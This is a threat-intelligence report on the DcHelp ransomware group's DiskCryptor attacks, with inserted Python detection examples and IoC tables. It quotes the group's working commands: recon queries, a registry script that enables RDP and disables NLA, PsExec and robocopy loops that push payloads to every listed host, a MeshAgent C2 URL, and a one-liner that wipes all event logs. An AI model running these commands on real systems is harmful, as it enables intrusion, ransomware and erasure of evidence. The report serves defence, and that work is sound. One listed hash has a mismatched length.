Man
While investigating another incident related to a ransomware attack, and hearing once again the question “how can this be, we have an antivirus!?”, we decided to share with the community information about the renewed activity of the DcHelp group.
In this article, we will talk about the increasing frequency of DcHelp attacks, consider the tactics and techniques of this group, and also note why antivirus is not a panacea and how legitimate software can be used against you.
Attackers have increasingly begun to use completely legitimate tools in their attacks, including data encryption tools that do not arouse suspicion in antivirus software. Let's look at one such group, whose activity increased in late 2024.
DcHelp profile
DcHelp (Enigma Wolf) is a group of hackers that attacks organizations in various industries and uses the open source software DiskCryptor to encrypt data on computers and servers.
If the attack on the infrastructure is successful, the attackers contact the victims via e-mail, Telegram or other means and demand that they purchase a password to regain access to the data. The ransom amount varies from $1,000 to $100,000. Payment is taken in Bitcoin, but it is possible to use other cryptocurrencies.
At the time of publication, the website https://dchelp.org/ is active, where you can read the FAQ and even leave feedback.
The DcHelp group has been active since at least late 2022, with recent incidents involving it recorded and investigated by the Jet CSIRT team in the second half of 2024.
How DcHelp attacks
Start of the attack
To gain initial access to its victims' infrastructure, DcHelp primarily targets "low-hanging fruit" and exploits vulnerabilities in publicly accessible services, conducts password guessing attacks, and uses legitimate credentials purchased from initial access brokers or found in leaks.
Having gained access to a node, the first thing attackers do is conduct reconnaissance and study the environment, for example by collecting information about the user, groups and domain controllers:
Code:
whoami
net user <redacted> /domain
net localgroup /domain
netdom query dc
net group "Domain Admins" /domain
If the system was accessed with an unprivileged account, the attackers escalate privileges and search for credentials in the system. To do this, they use the following tools:
- Mimikatz;
- PWVIEWER (Password Viewer);
- PWDCRACKU (Password Cracker);
- ARestore (Account Restore).
Attackers also search readable files and directories for password information using the search mechanisms built into the operating system, and look for saved passwords in browsers and e-mail clients.
To collect additional information about the infrastructure, attackers use:
- Advanced IP Scanner;
- Advanced Port Scanner;
- PowerShell commands.
Example PowerShell command:
Code:
Get-ADComputer -Filter * -Properties * | Sort ipv4* | FT Name, ipv4, oper, LastLogonDate -Autosize
The collected information is often saved directly on compromised systems in the temporary directory C:\tmp\:
- host.txt or hosts.txt
- computers.txt or AdComputers.txt
Persistence and distribution
After receiving information about the infrastructure, attackers actively use batch files to distribute and launch malware in their attacks. For example, one of the scripts changes the Windows registry settings, allowing remote connections via RDP:
Code:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f
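As an added example (not from the article), the following Python check parses `reg query` output for the two keys the script above modifies and reports the weakened state it leaves behind: RDP enabled, Network Level Authentication switched off, and any change of the listener port. The sample output is constructed, not taken from a real host.

```python
import re

TS_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP_KEY = TS_KEY + r"\WinStations\RDP-Tcp"

# Constructed 'reg query' output (not from a real host) showing the state the
# batch file leaves behind: RDP enabled and NLA switched off.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0
    TSEnabled    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x0
    PortNumber    REG_DWORD    0xd3d
"""

# One "    Name    REG_DWORD    0x..." line as printed by reg query.
_DWORD_RE = re.compile(r"^\s+(\S+)\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$")


def parse_reg_query(text):
    """Return {key_path: {value_name: int}} from 'reg query' style output."""
    result, current = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            result[current] = {}
        elif current is not None:
            m = _DWORD_RE.match(line)
            if m:
                result[current][m.group(1)] = int(m.group(2), 0)
    return result


def audit_rdp_settings(text, rdp_expected=False):
    """List the weakened settings the script sets. rdp_expected suppresses the
    first finding on hosts where RDP is legitimately enabled."""
    reg = parse_reg_query(text)
    ts, rdp_tcp = reg.get(TS_KEY, {}), reg.get(RDP_TCP_KEY, {})
    findings = []
    if ts.get("fDenyTSConnections") == 0 and not rdp_expected:
        findings.append("RDP enabled: fDenyTSConnections=0")
    if rdp_tcp.get("UserAuthentication") == 0:
        findings.append("NLA disabled: UserAuthentication=0")
    port = rdp_tcp.get("PortNumber")
    if port is not None and port != 3389:
        findings.append(f"RDP listener moved to port {port}")
    return findings


if __name__ == "__main__":
    for finding in audit_rdp_settings(SAMPLE_REG_QUERY):
        print(finding)
```

Run it against the output of `reg query` for both keys on a suspect host, or feed it an exported baseline to compare the pre- and post-incident state.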
To gain a foothold in the infrastructure, attackers use MeshAgent, built with the group's own C2 server embedded in it:
- C:\tmp\mesh.exe (also possible names are meshagent32.exe, meshagent-[domain].exe, etc.)
MeshAgent receives connection instructions from a .msh file, in the format "key=value". This file is not always found on compromised systems, but we can extract the lines of interest from the MeshAgent executable:
Code:
MeshServer=wss://techsupport.myftp.org:443/agent.ashx
This C2 server remained unchanged through multiple attacks.
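As an added example (not from the article or the MeshAgent project), the Python below carves the .msh-style `key=value` lines out of an agent binary, as described above, and checks the MeshServer host against the C2 reported here. The sample bytes are constructed; only MeshServer is quoted in the article, and the MeshName, MeshType, MeshID and ServerID keys are assumed from the .msh format.

```python
import re
from urllib.parse import urlparse

# Keys MeshAgent reads from its .msh settings; only MeshServer is quoted in the
# article, the others are assumed from the .msh format and treated as optional.
MSH_KEYS = ("MeshName", "MeshType", "MeshID", "ServerID", "MeshServer")

# Printable ASCII after "Key=" up to the line ending, searched across raw bytes
# so it works on the executable even when no .msh file is left on disk.
_SETTING_RE = re.compile(
    rb"(" + b"|".join(k.encode() for k in MSH_KEYS) + rb")=([\x20-\x7e]+)"
)

# C2 host reported in the article; extend with your own threat intelligence.
KNOWN_C2_HOSTS = {"techsupport.myftp.org"}


def extract_msh_settings(data: bytes) -> dict:
    """Return the first occurrence of each .msh key found in arbitrary bytes."""
    found = {}
    for match in _SETTING_RE.finditer(data):
        key = match.group(1).decode("ascii")
        found.setdefault(key, match.group(2).decode("ascii").strip())
    return found


def c2_endpoint(settings: dict):
    """Split MeshServer into (scheme, host, port, path); None if absent."""
    url = settings.get("MeshServer")
    if not url:
        return None
    parsed = urlparse(url)
    port = parsed.port or (443 if parsed.scheme == "wss" else 80)
    return parsed.scheme, parsed.hostname, port, parsed.path


def matches_known_c2(settings: dict) -> bool:
    endpoint = c2_endpoint(settings)
    return endpoint is not None and endpoint[1] in KNOWN_C2_HOSTS


# Constructed stand-in for a MeshAgent executable: PE-like header bytes, filler,
# an embedded settings block, then more binary noise. Not a real sample.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00" + b"\x00" * 40 + b"\xffnoise\x01\x02"
    + b"MeshName=support\r\nMeshType=2\r\n"
    + b"MeshID=0x0123456789ABCDEF\r\nServerID=FEDCBA9876543210\r\n"
    + b"MeshServer=wss://techsupport.myftp.org:443/agent.ashx\r\n"
    + b"\x00\x7f" * 24
)

if __name__ == "__main__":
    settings = extract_msh_settings(SAMPLE_BINARY)
    for key, value in settings.items():
        print(f"{key}={value}")
    print("known C2:", matches_known_c2(settings))
```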
Distribution of malware in the infrastructure is carried out using the robocopy utility:
Code:
for /f "delims=" %%i in (host.txt) do (
start robocopy %systemdrive%\tmp\tmp \\%%i\C$\tmp /R:0
ping 127.0.0.1 -n 1
)
Installation and launch of malware is performed using PsExec:
Code:
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s C:\tmp\mesh.exe -fullinstall
ping 127.0.0.1 -n 1
)
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s sc start "mesh agent"
ping 127.0.0.1 -n 1
)
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s C:\tmp\Notepad.bat
start psexec.exe -accepteula \\%%i -s C:\tmp\notepad.exe /SP- /TASKS="" /NOICONS /VERYSILENT /RESTART /SUPPRESSMSGBOXES /NOCANCEL
ping 127.0.0.1 -n 1
)
The encryption tool used is open source software DiskCryptor, and the hash of the executable file may differ from incident to incident, since a specific instance may have been compiled immediately before the attack. The attackers disguise this software as other legitimate programs, such as Notepad.exe.
Notably, if the infrastructure contains a Kaspersky Security Center (KSC) server that can be compromised, the attackers prefer to use its own functionality to create tasks that distribute and install malware on endpoints:
MeshAgent distribution via compromised KSC:
Code:
Event 7045, A service was installed in the system.
Service: KL Deployment Wrapper
User: \System
Path: C:\Windows\TEMP\KAVREM~1\C19BB5~4\setup.exe /s /z/p\"TASK_ID=c12xx345-f67x-8910-11x1-21xbz31z4151\"
StartType: Автоматически
Cmdline: C:\Windows\Temp\KAVREM~1\C123BB4~5\exec\m.exe
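As an added example (not from the article), here is Python detection logic over Event 7045 records in the key: value layout quoted above: it flags service installs that use the tool names from this report, run binaries named like mesh.exe, meshagent*.exe or m.exe, or execute from the C:\tmp and C:\Windows\Temp staging directories. The sample records are constructed; the paths and TASK_ID are placeholders.

```python
import re

# Service names and binaries the article ties to this intrusion set, plus the
# staging directories it reports (C:\tmp, C:\Windows\Temp).
SUSPECT_SERVICES = {"mesh agent", "psexesvc"}
SUSPECT_BINARY_RE = re.compile(r"^(mesh\.exe|meshagent.*\.exe|m\.exe)$", re.I)
TEMP_DIR_RE = re.compile(r"(^|\\)(tmp|temp)\\", re.I)

# Constructed Event 7045 records in the key: value layout the article quotes;
# the paths and TASK_ID are placeholders, not indicators from a real host.
SAMPLE_7045 = r"""
Event 7045, A service was installed in the system.
Service: KL Deployment Wrapper
User: \System
Path: C:\Windows\TEMP\KAVREM~1\C19BB5~4\setup.exe /s /z/p"TASK_ID=<placeholder>"
StartType: Automatic
Cmdline: C:\Windows\Temp\KAVREM~1\C123BB4~5\exec\m.exe

Event 7045, A service was installed in the system.
Service: mesh agent
User: \System
Path: "C:\Program Files\Mesh Agent\MeshAgent.exe"
StartType: Automatic

Event 7045, A service was installed in the system.
Service: Print Helper
User: \System
Path: "C:\Program Files\Vendor\helper.exe"
StartType: Automatic
"""


def parse_7045_events(text):
    """Split the key: value layout into one dict per 'Event 7045' record."""
    events, current = [], None
    for line in text.splitlines():
        if line.startswith("Event 7045"):
            current = {}
            events.append(current)
        elif current is not None and ": " in line:
            key, value = line.split(": ", 1)
            current[key.strip().lower()] = value.strip()
    return events


def exe_name(command):
    """Basename of the first token of a service path or command line."""
    path = command[1:].split('"', 1)[0] if command.startswith('"') else command.split(" ", 1)[0]
    return path.rsplit("\\", 1)[-1]


def flag_service_installs(text):
    """Return [(service, [reasons])] for records worth an analyst's attention."""
    flagged = []
    for ev in parse_7045_events(text):
        reasons = []
        if ev.get("service", "").lower() in SUSPECT_SERVICES:
            reasons.append("known tool service name")
        for field in ("path", "cmdline"):
            cmd = ev.get(field, "")
            if cmd and SUSPECT_BINARY_RE.match(exe_name(cmd)):
                reasons.append(f"{field} runs {exe_name(cmd)}")
            if cmd and TEMP_DIR_RE.search(cmd):
                reasons.append(f"{field} under a temp directory")
        if reasons:
            flagged.append((ev.get("service", "?"), reasons))
    return flagged
```

A "KL Deployment Wrapper" entry is also what a legitimate KSC push produces, so treat the temp-directory rule as a triage prompt to correlate with the KSC task history rather than as a verdict.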
Impact
After all the preparatory actions, the attackers encrypt the infrastructure by executing similar batch files that launch encryption on each node from the list in the host.txt file.
The encryption password is generated by logic in the batch file using the random number function; it is 13 characters long (Latin letters and digits). Encryption is performed with cryptographically strong algorithms (AES-256, Twofish, Serpent). The intruders copy the generated encryption passwords and delete them once the encryption process is complete.
Next, traces of presence on the node can be erased by clearing the OS logs:
Code:
cmd - for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Is recovery possible?
During incident investigations we were able to recover several passwords from among the deleted files, which allowed us to decrypt some of the servers.
If the system has not been rebooted since the incident, there is a chance of extracting passwords from RAM. However, we do not recommend relying on luck; rely instead on best practices for creating backups. The "3-2-1" principle still applies, but in the context of investigations we rarely see exemplary compliance with it. And, of course, you should not store backups in a single copy on the same device or in the same network segment.
Lessons learned
In modern attacks, attackers often use tools that security products consider completely legitimate, in order to reduce the likelihood of their activity being detected. Thus, the combination of DiskCryptor, MeshAgent and PsExec used here raises no suspicion in the installed antivirus, other than a possible detection labelled something like *not-a-virus*. In addition, such an attack can be implemented with other legitimate tools: for example, the ShrinkLocker encryptor uses the BitLocker built into Windows.
An incident investigation should end with a “lessons learned” stage, during which the factors that led to the incident are noted and measures are developed to prevent similar incidents in the future. Of course, the recommendations will vary greatly depending on the specific organization and the incident that occurred, the technologies and capabilities used.
As general recommendations, we highlight the following:
- It is worth starting with Attack Surface Management: look at your infrastructure through the eyes of attackers, then remove all the “low-hanging fruit” by installing missing updates and removing “extra” assets from the external perimeter;
- One of the most effective measures for raising the level of security is to allow access to the infrastructure from external networks only via a VPN with two-factor authentication;
- Ensure backups of critical systems and, when implementing a backup and recovery system, adhere to the “3-2-1” rule (store at least three copies of the data, two of them on two different media and the third on removable media).
Appendices
MITRE ATT&CK:
Tactic | Technique | Description |
--- | --- | --- |
Initial Access | T1133 External Remote Services | Attackers use remote access services with external connection capabilities to gain initial access to the network and/or gain a foothold in it |
Initial Access | T1190 Exploit Public-Facing Application | Attackers exploit vulnerabilities in systems accessible from the Internet. For example, popular MS Exchange vulnerabilities are ProxyLogon, ProxyShell |
Initial Access | T1078 Valid Accounts | Attackers use legitimate credentials to gain initial access, gain persistence, escalate privileges, or avoid detection |
Execution | T1059 Command and Scripting Interpreter: T1059.001 PowerShell, T1059.003 CMD | Attackers actively use command line and script interpreters to execute commands or run scripts and executable files |
Persistence | T1136 Create Account: T1136.001 Local Account, T1136.002 Domain Account | During attacks, attackers create accounts to gain a foothold in the infrastructure |
Persistence | T1078 Valid Accounts: T1078.002 Domain Accounts | Attackers use compromised accounts during attacks |
Privilege Escalation | T1078 Valid Accounts: T1078.002 Domain Accounts, T1078.003 Local Accounts | Compromised legitimate domain and local accounts are used to escalate privileges |
Defense Evasion | T1036.005 Masquerading: Match Legitimate Name or Location | Attackers disguise the malware they use as other legitimate programs |
Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools | Attackers disable security tools and change their settings |
Credential Access | T1003.001 OS Credential Dumping: LSASS Memory | Attackers obtain authentication data from the LSASS process memory |
Credential Access | T1552.001 Unsecured Credentials: Credentials In Files | Attackers search for authentication data in accessible files on compromised nodes |
Credential Access | T1555.003 Credentials from Password Stores: Credentials from Web Browsers | Attackers search for saved passwords in browsers |
Credential Access | T1555.005 Credentials from Password Stores: Password Managers | Attackers search for saved passwords in password managers |
Discovery | T1046 Network Service Discovery | Attackers scan and search for vulnerable resources (Advanced IP Scanner, Advanced Port Scanner) |
Discovery | T1087.001 Account Discovery: Local Account | Attackers collect information about local and domain accounts and groups using the commands whoami, net user, net group, Get-ADComputer |
Discovery | T1087.002 Account Discovery: Domain Account | Attackers collect information about local and domain accounts and groups using the commands whoami, net user, net group, Get-ADComputer |
Discovery | T1069.001 Permission Groups Discovery: Local Groups | Attackers collect information about local and domain groups using the commands whoami, net user, net group, Get-ADComputer |
Discovery | T1069.002 Permission Groups Discovery: Domain Groups | Attackers collect information about local and domain groups using the commands whoami, net user, net group, Get-ADComputer |
Discovery | T1083 File and Directory Discovery | Attackers browse files and directories on compromised systems |
Discovery | T1217 Browser Information Discovery | Attackers look at information stored in browsers to learn more about compromised environments and to obtain authentication data |
Lateral Movement | T1021 Remote Services: T1021.001 RDP, T1021.002 SMB, T1021.004 SSH | Attackers use remote access services and remote access protocols to move within the infrastructure |
Lateral Movement | T1570 Lateral Tool Transfer | Attackers transfer tools or other files between compromised systems (e.g. via SMB, RDP, PsExec) |
Command and Control | T1219 Remote Access Software | Attackers use third-party software to provide remote access and establish an interactive command and control channel on target systems |
Impact | T1529 System Shutdown/Reboot | Attackers can shut down/reboot systems to restrict access to them, reduce the chances of password recovery, and overwrite data in RAM |
Impact | T1486 Data Encrypted for Impact | Attackers encrypt data to extort a ransom |
IoCs, network indicators of compromise:
No | IP address | Side | ASN | Additional information |
--- | --- | --- | --- | --- |
1. | 159.100.22.162 | OF | AS 44066 | C2 server techsupport.myftp[.]org |
IoCs, file indicators of compromise:
No | File name | Hash | Information |
--- | --- | --- | --- |
1. | RDPRemoteEnabler_Free.exe | MD5: f4193a842a3f9ca03f687c7515e330ac SHA-1: 229b429820f63b9aa83cb1fd9a29c5c8d0410dd2 SHA-256: 9efa419cc3bb00ebb0f101685ff86b09a78ea230415ad09e7044e90fb357d6b2 | Changes Windows settings to allow RDP connections |
2. | advanced_port_scanner_2.5.3869.exe | MD5: 6a58b52b184715583cda792b56a0a1ed SHA-1: 3477a173e2c1005a81d042802ab0f22cc12a4d55 SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb | Network scanner |
3. | clear.bat | MD5: 9b6becd8aeb8a42e70a6200a40600100 SHA-1: 4470d0f7d52eb130816cced2638f1b3300ee70c4 SHA-256: b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf | Script for clearing OS logs |
4. | mesh.exe | SHA1: 39F9CAA77483E26337F598E04F8C6166 | MeshAgent |
5. | meshagent32.exe | SHA1: b4a5f9f3af3cef951259675128cf56808832d91a | MeshAgent |
6. | notepad.exe | MD5: def004f1ed671f0627970ecbf241371e SHA-1: 98f4e14d9378ff50ab882ad37263465fa0cf8d31 SHA-256: 018d0b2af8479147def984a4c6a0db31703baacd87557d51271ad8c952f450b8 | DiskCryptor |
7. | universaltermsrvpatch-x64.exe | MD5: 0546abe6293ba40348e1734fafca47ec SHA-1: 37c0d892b38bbf9d8c6a8d35db5b32555cb758c8 SHA-256: 5161cdafd0c6d79616d775f79214b2e7e3ad13de71db63e9fa6bfc448ba4084b | Software for changing Windows settings to allow multiple RDP sessions |
8. | ARestore.exe | MD5: 7f86b67ac003eda9d2929c9317025013 SHA-1: 343051cc1b3f33201d076478ea9badc796951423 SHA-256: fcea81909388611359bbaf41871300075e192a3246b9e1bebc5f3f0aaa2b2c9a | hacktool.bruteforce/msil |
Source